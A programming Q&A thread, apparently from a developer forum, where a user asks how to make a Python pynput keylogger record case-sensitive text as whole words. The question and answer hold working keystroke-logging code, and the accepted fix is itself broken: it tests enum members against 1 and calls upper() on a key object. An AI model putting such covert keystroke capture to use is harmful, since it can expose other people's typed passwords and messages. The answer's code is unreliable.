# Python : keylogger with case sensitive "

Tags: python, keylogger

i'm creating a keylogger in python, the thing is

**Problem cases :**

```
it didn't capture as a **word/sentence**

no **case sensitive**.
```

**Logger Source code**

```
from pynput.keyboard import Key, Listener
import logging

#log file path
log_path=""

logging.basicConfig(filename=(log_path+"log_file.txt"), level=logging.DEBUG, format='%(asctime)s: %(message)s' ) 

def btn_press(key):
    logging.info(key)


with Listener(on_press=btn_press) as listene:
    listene.join()
```

**test case :**

"HelLo LoggeR"

**LOG file/output**

'h'

'e'

'l'

'l'

'o'

'l'

'o'

'g'

'g'

'e'

'r'

**Expected Result should be

LOG File/out**

HelLo LoggeR

any modification to improve this feature

Comment: you have to detect shift/caps lock pressed and act accordingly.

Comment: BTW there's already a keylogger package: https://pypi.org/project/keylogger/

Answer (score 0, accepted):

to improve it, you could check whether the caps lock is on with the attribute: caps_lock or if any shift key is pressed before recording the letter with the method: shift_pressed or you could use the attribute :shift which is a generic modifier to identify if any shift key is pressed.

the modifiers doesn't really determine whether the key is being pressed physically because they're use internally within the controller but that could be a way to determine whether is pressed or if the attribute is set to 1 or True.

```
from pynput.keyboard import Key, Listener
import logging
#log file path
log_path=""

logging.basicConfig(filename=(log_path+"log_file.txt"), level=logging.DEBUG,format='%(asctime)s: %(message)s' ) 

def btn_press(key):
    if Key.caps_lock == 1 or Key.shift == 1:
        # set the key value to upper
        # your code here
        key.upper()
    logging.info(key)


with Listener(on_press=btn_press) as listene:
    listene.join()
```

for more information,: [check the documentation even if it's not very well covered, it might help you](https://pynput.readthedocs.io/en/latest/keyboard.html#pynput.keyboard.Controller.modifiers)

Comment: well, that's a nice logic but what about symbols(shift+1=>!), and any idea about getting it in a sentence.

Comment: that's what I said in the comment('your code here'), you should check that the key is not a symbol, in the documentation the class Key has flags for all of the alternate keys that don't represent a character nor a number.

Comment: To be honest, that keylogger requires more than just that, it needs to cover more functionalities, you're just logging everything that comes,  it should log the complicated functions as well if you're trying to use it for security purposes.

Comment: functionalities like ?

Comment: the same, when you're keylogging, it goes character per character, so you should create that code in order join the chars into a sentence and need to check for spaces, punctuation, signs, special characters, etc.

Comment: would you help/suggestion related to this ? here or any other IRC would be better

Comment: ctrl + v or ctrl + c  some of those functionalities, that's my opinion

Comment: what do you mean?

Comment: rather than commenting like chat coz i can't get it clearly. it would be a great help to learn more things and clarifying.

Comment: ahhh, let me see, install [this app](https://me-download.wickr.com/#/version/me) and create an account then send me your username through here

Comment: wickr : vishallight